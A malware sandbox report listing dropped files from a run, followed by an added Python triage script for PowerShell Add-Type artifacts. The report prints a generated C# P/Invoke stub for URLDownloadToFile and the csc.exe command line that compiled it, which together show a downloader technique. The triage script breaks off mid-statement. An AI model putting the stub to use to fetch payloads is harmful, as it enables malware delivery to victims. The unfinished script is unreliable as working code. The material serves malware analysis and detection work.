                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                              Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                              MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                              SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                              SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                              SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):30076
                                                                                                                                                                                                                              Entropy (8bit):5.567681757348418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:dW10i79LoL6yTWPF9fEm8F1+UoAYDCx9Tuqh0VfUC9xbog/OV4YNL+zurwA7i:dW10i7pW6yTWPF9fEmu1ja1YNizrai
                                                                                                                                                                                                                              MD5:9461EBAAABBC9255D78F7C23D7B52C15
                                                                                                                                                                                                                              SHA1:9A00BB6B50D6D31475EE1A97843F6ED4995498C6
                                                                                                                                                                                                                              SHA-256:FC286DBDDEDAC892061503056D253E108E417CAC356FC64C3B9B18FBE09ECB9B
                                                                                                                                                                                                                              SHA-512:5CC2C915C8C8D228A8AA6FBADEFF5361CA2D966611EA618E02B102CA14C8ADA4DFCF3D5BC324C5185EDAC913D99070E16DC0B3138F8BDCE92C06DBBBB9ED8FF7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:117.0.2045.47
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090498129723178
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kOCLmZGftR96hOxq4gFkFDlwWE7RTupzKscDX//NPC3:z/Ps+wsI7ynJtGhOxqQoRTuiVIou
                                                                                                                                                                                                                              MD5:9BB971F02CE58B8C3E4CC9FBD015694D
                                                                                                                                                                                                                              SHA1:C800960A86EC73849D19B2CE848096F90A273471
                                                                                                                                                                                                                              SHA-256:DFD1C6BFDA1689CC35D1F411CAABCC8358968C4458A0FE1D387B08DDCBB3C16B
                                                                                                                                                                                                                              SHA-512:29A495881F27FC1891AA1F2B0670DE8176E1336D6BBB827A7B9C21932722ECEAA04A074A0D5D77CF8736ED22497578B9D169530657AF2CEE648392D3648B0281
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090498129723178
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kOCLmZGftR96hOxq4gFkFDlwWE7RTupzKscDX//NPC3:z/Ps+wsI7ynJtGhOxqQoRTuiVIou
                                                                                                                                                                                                                              MD5:9BB971F02CE58B8C3E4CC9FBD015694D
                                                                                                                                                                                                                              SHA1:C800960A86EC73849D19B2CE848096F90A273471
                                                                                                                                                                                                                              SHA-256:DFD1C6BFDA1689CC35D1F411CAABCC8358968C4458A0FE1D387B08DDCBB3C16B
                                                                                                                                                                                                                              SHA-512:29A495881F27FC1891AA1F2B0670DE8176E1336D6BBB827A7B9C21932722ECEAA04A074A0D5D77CF8736ED22497578B9D169530657AF2CEE648392D3648B0281
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):44170
                                                                                                                                                                                                                              Entropy (8bit):6.090498129723178
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kOCLmZGftR96hOxq4gFkFDlwWE7RTupzKscDX//NPC3:z/Ps+wsI7ynJtGhOxqQoRTuiVIou
                                                                                                                                                                                                                              MD5:9BB971F02CE58B8C3E4CC9FBD015694D
                                                                                                                                                                                                                              SHA1:C800960A86EC73849D19B2CE848096F90A273471
                                                                                                                                                                                                                              SHA-256:DFD1C6BFDA1689CC35D1F411CAABCC8358968C4458A0FE1D387B08DDCBB3C16B
                                                                                                                                                                                                                              SHA-512:29A495881F27FC1891AA1F2B0670DE8176E1336D6BBB827A7B9C21932722ECEAA04A074A0D5D77CF8736ED22497578B9D169530657AF2CEE648392D3648B0281
                                                                                                                                                                                                                              Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
Category:dropped
Size (bytes):8192
Entropy (8bit):0.01057775872642915
Encrypted:false
SSDEEP:3:MsFl:/F
MD5:CF89D16BB9107C631DAABF0C0EE58EFB
SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):270336
Entropy (8bit):8.280239615765425E-4
Encrypted:false
SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
MD5:D0D388F3865D0523E451D6BA0BE34CC4
SHA1:8571C6A52AACC2747C048E3419E5657B74612995
SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):0.011852361981932763
Encrypted:false
SSDEEP:3:MsHlDll:/H
MD5:0962291D6D367570BEE5454721C17E11
SHA1:59D10A893EF321A706A9255176761366115BEDCB
SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:data
Category:dropped
Size (bytes):8192
Entropy (8bit):0.012340643231932763
Encrypted:false
SSDEEP:3:MsGl3ll:/y
MD5:41876349CB12D6DB992F1309F22DF3F0
SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
Malicious:false

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):41746
Entropy (8bit):6.091485863975892
Encrypted:false
SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kv5LmZF+0bW6ADvRcwWE7RTupzKscDX//NPC1ou:z/Ps+wsI7ynrAoRTuiVIou
MD5:82EA2991D82F36373A35C80DE983D7FB
SHA1:5B84C002D2AD5AA495D9249E07E311F7B22C92E7
SHA-256:C6A75F68ACAAD5A98E241919020CB1E6D1B1A44B342026A7BDA0706D0D934ADB
SHA-512:5BF4AD1B0139C3362E0AFB45A8CAF5A4FA47FBBB6B143D9FC8FD3178FAACC19A5167E65743C69D5530C8706F4B101440BE8E537249B9A8C1863807A58BF84513
Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"

Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:modified
Size (bytes):41746
Entropy (8bit):6.091485863975892
Encrypted:false
SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kv5LmZF+0bW6ADvRcwWE7RTupzKscDX//NPC1ou:z/Ps+wsI7ynrAoRTuiVIou
MD5:82EA2991D82F36373A35C80DE983D7FB
SHA1:5B84C002D2AD5AA495D9249E07E311F7B22C92E7
SHA-256:C6A75F68ACAAD5A98E241919020CB1E6D1B1A44B342026A7BDA0706D0D934ADB
SHA-512:5BF4AD1B0139C3362E0AFB45A8CAF5A4FA47FBBB6B143D9FC8FD3178FAACC19A5167E65743C69D5530C8706F4B101440BE8E537249B9A8C1863807A58BF84513
Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:L:L
MD5:5058F1AF8388633F609CADB75A75DC9D
SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:false
Preview:.
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9cdd386c, page size 32768, DirtyShutdown, Windows version 10.0
Category:dropped
Size (bytes):15728640
Entropy (8bit):0.1010164436272026
Encrypted:false
SSDEEP:1536:uSB2jpSB2jFSjlK/Qw/ZweshzbOlqVqdesWzbYFIeszO/Z5eHW5d:ua6a2UueqkzYRzOW
MD5:249FEB833BF1C58EFC76A82D24633D3B
SHA1:B4AA9A3B2DDC9A6EF5475A8FAACDE445423CECDD
SHA-256:8E7F0BEC4C74B7BE40E4D00DDFBD99FE7FE7D20968BA56F829DEA9444B29B632
SHA-512:84206F5C7EDF45E822A8D269371D54508F33C21000E006084EA38686688EF47F8D5B2A6E018D8D3C9A01BAD2B850161B521CA2E90D83A342F7A09FC65A291F26
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..8l... ...................':...{........................P......"...{#.'"...{..h.R.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{..................................xX.t'"...{...................G1.'"...{...........................#......h.R.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:..
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1420
                                                                                                                                                                                                                              Entropy (8bit):5.378575820685335
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa07a1Dx54LC07Y5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa071
                                                                                                                                                                                                                              MD5:4F31CCCA37A07864D8EAEC8FED89BB61
                                                                                                                                                                                                                              SHA1:21C4009E29A1D16A50A505480FAE7229931E2C22
                                                                                                                                                                                                                              SHA-256:0C2AC30C333061C65834061E104227853D453BE5C44A4BAE5B6860A6A1A4A80E
                                                                                                                                                                                                                              SHA-512:93A38285D07835324CB8CCAA98F3C79C7508B34BEA76FED91CB0ED1395D98A72A074A67C2720CE2044C43FC14DF22076FE903995CF009F844718037984D4EF52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                              File Type:MSVC .res
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):652
                                                                                                                                                                                                                              Entropy (8bit):3.120177967590278
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry41ak7YnqqD6PN5Dlq5J:+RI+ycuZhNS1akSD6PNnqX
                                                                                                                                                                                                                              MD5:5C30B5E4EF6E345F9B5501A0FB7F5BEF
                                                                                                                                                                                                                              SHA1:CFC02C69C67CAF0FBB56AF29325DD22854E52A2B
                                                                                                                                                                                                                              SHA-256:A3BE696E1EB166E37A0F917503DF81EA7D8048BA9082F0700C7259B368F4D36B
                                                                                                                                                                                                                              SHA-512:A458E6B7E7247AF844CD61340014FE29960F6E5AB9745D89BEA5D0A783B7C1CD1534B8A8F092023602CED00976B07E3B37DA3174B960461175150F79E0834D1D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.z.f.3.q.r.f.x...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.z.f.3.q.r.f.x...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (363)
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):480
                                                                                                                                                                                                                              Entropy (8bit):3.83065676495063
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:V/DsYLDS81zu2Wdy8jMOHQXReKJ8SRHy4HwwuZCl/QAgy:V/DTLDfu2YTwXfHPuHy
                                                                                                                                                                                                                              MD5:C66E77D41AF1843E35B6467CC2482922
                                                                                                                                                                                                                              SHA1:F224CAC3DD486AC45F0DEBD3EC7343BB3150D1D3
                                                                                                                                                                                                                              SHA-256:C9D35DF0658D18E1F5A467FE8AACC3DA8BAFF1681FC5B95EFBC7B4325DF1595D
                                                                                                                                                                                                                              SHA-512:7C3BC95EB54636A65790070923B7FCB41CAC1CB38570D2803448C36CE7048CB920F03A6C33DB48237B4A317795D4C4895B97091FEE12E947EFB1D7547C4A1C4B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.using System;.using System.Runtime.InteropServices;..namespace Mwur.{. public class wjkOOxElX. {. [DllImport("URLMOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr SkysDz,string fyAyba,string FfHhH,uint tjc,IntPtr OmquhlvmBI);.. }..}.
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (368), with no line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):371
                                                                                                                                                                                                                              Entropy (8bit):5.300871831062841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2CHhJ23ftMdzxs7+AEszICHhJ23ftM4:p37Lvkmb6KiIWZEvF
                                                                                                                                                                                                                              MD5:140800A383E844DC555FCD70DF5F0E9C
                                                                                                                                                                                                                              SHA1:3573C2892B3AE6C93250DB7437E2329C678F5B1A
                                                                                                                                                                                                                              SHA-256:2D8F2F114F315C690F3B9126510E1BA4B88D0B0E55BDAF8E156D31A96AF418AB
                                                                                                                                                                                                                              SHA-512:979CC543E010CF745D27E11A45BD2B54E7807D0D7A3A43BDDE6B89C76EF8B85C5C225242793ADF95CD18B15A9F4668E02ABBC0367B104462360AB11FC45D63B5
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.0.cs"
                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3072
                                                                                                                                                                                                                              Entropy (8bit):2.843781772819573
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:etGSMePBe5ekrl8sN8gkQtlqBdO7nytkZfyGObCZ0WI+ycuZhNS1akSD6PNnq:68skr+kwO7n1JyLbCZX1ulGa3iq
                                                                                                                                                                                                                              MD5:273D350A196B6E00B7D9840E77E6B17F
                                                                                                                                                                                                                              SHA1:395A5D3722386DD660F5D58A762D843D07AAB4F1
                                                                                                                                                                                                                              SHA-256:21A2A451A1D57673B51F4C2E205584F2A837D7A3D61D2D1804B94AAC3A26742A
                                                                                                                                                                                                                              SHA-512:8D28635AD3CAD05EBA4932E2A008F2B62435E1780CA039FB9D76AF236E06040637426B1F7D264A97F86ECC5BD9E2A42FFFB612978CB400B7FA4F68B2CCCE9EAB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~;g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....x.....x...........................!.............. =.....P ......O.........U.....\.....c.....i.....m...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.hz
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (449), with CRLF, CR line terminators
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):870
                                                                                                                                                                                                                              Entropy (8bit):5.337134512608774
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KOqd3ka6KiZEvgKax5DqBVKVrdFAMBJTH:xika6LZEvgK2DcVKdBJj
                                                                                                                                                                                                                              MD5:70967DB669C90F6B18C63527736FA373
                                                                                                                                                                                                                              SHA1:1E8E507970C579B8FE0240F116DE81DB29EA4931
                                                                                                                                                                                                                              SHA-256:C0BC88EA103FA66F708C9BCA6927A75CE0EFDCF9ADA16C1F2F986F652A3AA1A9
                                                                                                                                                                                                                              SHA-512:8061BE6DF3C3C03695BB6A017F4AF7C9FB548579DB05B8229B4153A171CB09919A524C0C854BE5FC6382154881F12D0E167D9BD1C36A3A249339B933845579C5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
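The .cmdline and .0.cs entries above, together with the hzf3qrfx.dll they produce and the compiler banner here, are the artifacts of PowerShell's Add-Type compile step: the response file hands csc.exe a reference to System.Management.Automation.dll and an output path in a random-named folder under Temp, and the generated source declares a P/Invoke stub for URLDownloadToFile in urlmon.dll. The following Python is an added triage example, not part of the Joe Sandbox report and not the sample's own code. It parses those two text artifacts (the sample strings are copied from the previews above, with the source's line breaks restored and the .cmdline's leading BOM dropped) and reports the indicators a responder would pivot on. The rule names, the Add-Type path heuristic, the download-API table and the module-name casing check are this example's own assumptions.

```python
"""Triage the files PowerShell's Add-Type leaves behind when it compiles P/Invoke
stubs with csc.exe: parse the csc .cmdline response file and the generated .cs
source, then flag the indicators a responder looks for. The rules below are this
example's own heuristics, not the sandbox's signatures."""
import re

# Constructed from the report's preview: the csc.exe response file written by Add-Type
# (the UTF-8 BOM that the preview renders as a leading '.' is omitted).
SAMPLE_CMDLINE = (
    r'/t:library /utf8output /R:"System.dll" '
    r'/R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation'
    r'\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" '
    r'/R:"System.Core.dll" '
    r'/out:"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.dll" '
    r'/debug- /optimize+ /warnaserror /optimize+ '
    r'"C:\Users\user\AppData\Local\Temp\hzf3qrfx\hzf3qrfx.0.cs"'
)

# Constructed from the report's preview: the .0.cs source Add-Type generated, line breaks restored.
SAMPLE_SOURCE = '''using System;
using System.Runtime.InteropServices;

namespace Mwur
{
    public class wjkOOxElX
    {
        [DllImport("URLMOn.DLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr SkysDz,string fyAyba,string FfHhH,uint tjc,IntPtr OmquhlvmBI);

    }
}
'''

# Assumption: Add-Type writes <Temp>\<random8>\<random8>.dll next to <random8>.0.cs,
# which is the layout seen in the report (hzf3qrfx\hzf3qrfx.dll).
ADDTYPE_OUT_RE = re.compile(r'\\AppData\\Local\\Temp\\([a-z0-9]{8})\\\1\.dll$', re.IGNORECASE)

# [DllImport("mod", ...)] static extern <ret> <name>(  -- the P/Invoke declaration shape.
PINVOKE_RE = re.compile(
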